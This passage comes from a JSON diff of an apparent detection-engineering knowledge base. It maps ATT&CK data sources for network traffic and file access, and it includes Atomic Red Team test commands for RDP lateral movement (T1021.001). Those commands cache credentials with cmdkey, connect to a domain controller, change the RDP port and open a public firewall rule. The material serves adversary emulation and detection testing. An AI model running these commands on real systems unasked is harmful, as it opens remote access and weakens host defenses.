netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1021.001", + "command_list": [ + "$Server=$ENV:logonserver.TrimStart(\"\\\")\n$User = Join-Path #{domain} #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=#{logonserver}\n$User = Join-Path $Env:USERDOMAIN #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=#{logonserver}\n$User = Join-Path #{domain} $ENV:USERNAME\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=#{logonserver}\n$User = Join-Path #{domain} #{username}\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=\"WIN-DC\"\n$User=\"#{username}\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=\"#{logonserver}\"\n$User=\"Administrator\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=\"#{logonserver}\"\n$User=\"#{username}\"\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{NEW_Remote_Port}\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}\n", + "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value 4489\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 4489\n", + "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}\n", + "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 4489 -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=4489\n" + ], + "commands": [ + { + "command": "$Server=$ENV:logonserver.TrimStart(\"\\\")\n$User = Join-Path #{domain} #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=#{logonserver}\n$User = Join-Path $Env:USERDOMAIN #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=#{logonserver}\n$User = Join-Path #{domain} $ENV:USERNAME\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=#{logonserver}\n$User = Join-Path #{domain} #{username}\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=\"WIN-DC\"\n$User=\"#{username}\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=\"#{logonserver}\"\n$User=\"Administrator\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=\"#{logonserver}\"\n$User=\"#{username}\"\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{NEW_Remote_Port}\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value 4489\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 4489\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 4489 -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=4489\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.001", + "display_name": "Remote Services: Remote Desktop Protocol", + "atomic_tests": [ + { + "name": "RDP to DomainController", + "auto_generated_guid": "355d4632-8cb9-449d-91ce-b566d0253d3e", + "description": "Attempt an RDP session via Remote Desktop Application to a DomainController.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "logonserver": { + "description": "ComputerName argument default %logonserver%", + "type": "String", + "default": "$ENV:logonserver.TrimStart(\"\\\")" + }, + "domain": { + "description": "domain argument default %USERDOMAIN%", + "type": "String", + "default": "$Env:USERDOMAIN" + }, + "username": { + "description": "Username argument default %username%", + "type": "String", + "default": "$ENV:USERNAME" + }, + "password": { + "description": "Password", + "type": "String", + "default": "1password2!" + } + }, + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "$Server=#{logonserver}\n$User = Join-Path #{domain} #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "cleanup_command": "$p=Tasklist /svc /fi \"IMAGENAME eq mstsc.exe\" /fo csv | convertfrom-csv\nif(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }\n", + "name": "powershell" + } + }, + { + "name": "RDP to Server", + "auto_generated_guid": "7382a43e-f19c-46be-8f09-5c63af7d3e2b", + "description": "Attempt an RDP session via Remote Desktop Application over Powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "logonserver": { + "description": "ComputerName", + "type": "String", + "default": "WIN-DC" + }, + "username": { + "description": "Username", + "type": "String", + "default": "Administrator" + }, + "password": { + "description": "Password", + "type": "String", + "default": "1password2!" + } + }, + "executor": { + "command": "$Server=\"#{logonserver}\"\n$User=\"#{username}\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "cleanup_command": "$p=Tasklist /svc /fi \"IMAGENAME eq mstsc.exe\" /fo csv | convertfrom-csv\nif(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }\n", + "name": "powershell" + } + }, + { + "name": "Changing RDP Port to Non Standard Port via Powershell", + "auto_generated_guid": "2f840dd4-8a2e-4f44-beb3-6b2399ea3771", + "description": "Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "OLD_Remote_Port": { + "description": "Default RDP Listening Port", + "type": "String", + "default": "3389" + }, + "NEW_Remote_Port": { + "description": "New RDP Listening Port", + "type": "String", + "default": "4489" + } + }, + "executor": { + "command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{NEW_Remote_Port}\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}\n", + "cleanup_command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{OLD_Remote_Port}\nRemove-NetFirewallRule -DisplayName \"RDPPORTLatest-TCP-In\" 